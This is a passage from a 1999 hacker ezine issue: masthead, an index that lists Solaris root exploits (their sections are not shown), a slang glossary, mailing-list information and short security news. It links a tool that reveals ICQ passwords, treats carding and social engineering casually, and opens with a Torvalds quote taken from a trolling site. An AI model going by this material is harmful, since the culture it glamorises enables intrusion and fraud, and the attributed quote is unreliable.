💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn18.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 18 Volume 1 1999 May 15th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Linus on life...
Torvalds said, "To explain human motivation, I've come up with Linus' Law, which
states the three motives that drive us: survival, social life, and entertainment."
He claimed that human history moves through each motive in cycles. "Think of sex,"
he said. "First, it was used for procreation to survive. Then it became a social
bonding tool. And now it's at its apex, as entertainment. Right now, I believe
we're moving into an entertainment society." He added that Rome had also been an
entertainment society just before its powerful empire began to implode. And that
was when things began to go wrong -- at least, ethically speaking. Much to his
theoretical colleagues' chagrin, Torvalds revealed that he isn't interested in
human welfare, seeing as we're all doomed anyway. He'd much rather have fun than
think about all that stuff. While the panelists and audience listened in dismay,
Torvalds asserted that LINUX was good largely because it was entertaining, and that
he didn't worry much about poor people because the world is unfair and that's just
how it is.
- NewsTrolls
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #18
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #18
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Mitnick Hearing..................................................
04.0 .. U.S Embassy and DOE sites cracked................................
05.0 .. "The Egg" `Cracked'..............................................
06.0 .. Student changes grades...........................................
07.0 .. IBM's Gift To Australia's Security...............................
08.0 .. SCREAM busted....................................................
09.0 .. Corel Hacked.....................................................
10.0 .. G0at Security calls it quits.....................................
11.0 .. Guninski uncovers yet another browser bug........................
12.0 .. Freaky to do a Macintosh related speech at Defcon7 ..............
13.0 .. IIS 2.0 "Security" by p0lix......................................
14.0 .. l0pht Security Advisory on MS IIS 4.0............................
15.0 .. X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties
16.0 .. Microsoft Security Bulletin : File viewers vulnerability (MS99-13)
17.0 .. iParty pooper....................................................
18.0 .. Microsoft Security Bulletin: Excel 97 virus patch (MS99-14)......
19.0 .. LISA install leaves root access OpenLinux 2.2 ...................
20.0 .. BUGTRAQ list receives a plaque at SANS...........................
21.0 .. White House takes server offline after hack .....................
22.0 .. Feds to install IDS..............................................
23.0 .. CIH damages climb in China.......................................
24.0 .. Company claims damages from web defacement.......................
25.0 .. .gov sites hacked in protest of embassy bombing..................
26.0 .. Full Disclosure, the only way to go..............................
27.0 .. NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
28.0 .. Cure for CIH.....................................................
29.0 .. Anonymous surfing from 303.org...................................
30.0 .. Yugoslavia offline...............................................
31.0 .. Spam Recycling site deals with spammers for you..................
32.0 .. quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner...
33.0 .. sdtcm_convert local root overflow exploit for Sparc..............
34.0 .. lpset local root overflow exploit for solaris x86................
35.0 .. admintool local root exploit for solaris x86 machines............
36.0 .. dtprintinfo buffer overflow for solaris x86......................
37.0 .. Are we running out of IP numbers? how many class c's are left??..
27.1 .. And is webspace infinite?........................................
38.0 ,, Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
39.0 .. IBM breaks more records with denser hard disk storage............
40.0 .. Carmack offers a bounty on Quake server DoS's and bug reports....
41.0 .. Hack into a webserver and win $10,000 ...........................
42.0 .. SSHD vulnerability found by JJF Hackers Team.....................
43.0 .. Neil Stephenson author of "Snow Crash" releases new book.........
44.0 .. Novell Netware 4.0 advisory by Nomad Mobile Research Center......
45.0 .. Penalties for Pirates may increase...............................
46.0 .. British Spy's site shutdown on Geocities?........................
47.0 .. The Virus Hype, Fact or Fiction by Thejian.......................
48.0 .. The Internet Fraud Council.......................................
49.0 .. Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
50.0 .. [ISN] A ban on unauthorized computer access in Japan to be enacted
51.0 .. Virtual Vault Vulnerable.........................................
52.0 .. PoC GalaDRiel Corel virus resurfaces.............................
53.0 .. Web attacks a 'nuisance' says DoD................................
54.0 .. GPS's have a Y2K problem early...................................
55.0 .. Retinal scans?...................................................
56.0 .. FreeBSD high speed SYNflood patch................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org">Link</a>
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ ICQ99 network password puller
Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 09:29:01 -0400
From: Dmitri Alperovitch <dmitri@ENCRSOFT.COM>
Subject: ICQ Password Revealer
To: BUGTRAQ@netspace.org
Hi.
A few weeks ago, it was posted that ICQ99 stores the password
used to access the ICQ network in plain-text in the .DAT files.
We have written a program that demonstrates this by parsing
these .DAT files for password and showing it to the user.
It can be downloaded at http://www.encrsoft.com/products.html#icqpass
Note: The option to save password can be turned off in ICQ's
Security & Privacy settings.
Yours truly,
Dmitri Alperovitch
Encryption Software - Developers of TSM for ICQ, an ICQ encryption add-on
http://www.encrsoft.com
dmitri@encrsoft.com
++ Friday May 14th
From HNN http://www.hackernews.com/
Zyklon Busted
contributed by Zyklon
HNN has received a report that a grand jury has indicted
Zyklon. The reports indicate that he has been indicted
on various computer related crimes and that he will be
officially charged on May 24th. It is unknown at this
time exactly what the charges will be or what crimes
have supposedly been committed
++ Japan Enacts Cracking Ban
From HNN http://www.hackernews.com/
contributed by Hisir0
A Japanese bill sponsored by the National Police Agency,
the Ministry of Posts and Telecommunications, and the
Ministry of International Trade and Industry (MITI) has
been submitted to the Diet after it was adopted at a
Cabinet meeting on April 16. It is expected to pass the
Diet by the end of June. This bill will outlaw
unauthorized access to computer systems in Japan and
will carry penalties of fines and imprisonment.
Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/70042
++ PRIVACY ISSUES
From http://www.net-security.org/
by BHZ, Thursday 13th May 1999 on 3:38 pm CET
Do Web sites tell their visitors whether they collect personal data and how they use
it? In a separate sampling of 364 randomly selected sites, 65.7 percent gave privacy
notices (much better then last year when only 14% of sites gave those kind of
notices). Read about the study on ZdNet.
http://www.zdnet.com/zdnn/stories/news/0,4586,2258012,00.html?chkpt=hpqs014
++ Don't delete Microsoft files !
From www.403-security.org
Astral 11.05.1999 12:20
Office 2000, would be well advised to avoid trying to reduce the size of its massive footprint
by deleting files to recover space. Even the most innocuous little text files seem to have some
strange and arcane purpose in Bill�s Great Scheme Of Things.For example deleting file DELME.txt
is going cause starting install procedure every time Office files are executed.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
No mail for sharing this week!
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Issue #18 'w00ten'
*
*
*
*
*
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Mitnick Hearing
~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
May 10th
Mitnick Hearing Scheduled for Tomorrow
contributed by punkis
The recent release of letters claiming outrages damages from companies allegedly
targeted by Kevin Mitnick have not pleased the prosecution. The prosecution has
filed a motion to have the defense held in contempt for releasing the information.
A hearing scheduled for tomorrow originally scheduled to determine Kevin's
future earnings potential may also address this motion. The hearing is tomorrow
(Tuesday) at 10:00 at: U.S. Central District of California Western Division - Spring
Street Court House, 312 N. Spring Street, Los Angeles, CA 90012. If you are in the
area stop in and show Kevin some support. It should be some exciting drama.
May 11th
This hearing was cancelled, no news on when it is to be rescheduled.
@HWA
04.0 U.S Embassy and DOE sites cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
US Embassy and DOE web sites Cracked
From HNN http://www.hackernews.com/
contributed by cult hero
